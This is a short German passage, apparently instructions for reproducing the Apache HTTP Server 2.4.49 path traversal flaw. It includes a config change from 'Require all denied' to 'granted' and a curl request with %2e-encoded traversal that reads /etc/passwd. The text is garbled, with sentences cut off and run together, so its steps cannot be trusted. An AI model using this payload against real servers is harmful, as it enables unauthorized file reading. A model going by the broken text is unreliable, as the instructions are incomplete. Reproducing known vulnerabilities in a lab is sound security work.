
Reproduktion der Path-Traversal-Sicherheitslücke in Apache HTTP Server 2.4.49
ap_normalize_path auf. Ein Angreifer kann durch das Erstellen spezieller Anfragen mit %2e-Kodierungen die Zugriffskontrollen umgehen und beliebige Dateien auf dem Webserver lesen.<Directory /> das Require all denied zu Require all granted/vuln hinzu, der auf /tmp/vuln_dir verweist, und legen Sie die Berechtigungen festcurl -v --path-as-is 'http://127.0.0.1:8080/vuln/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
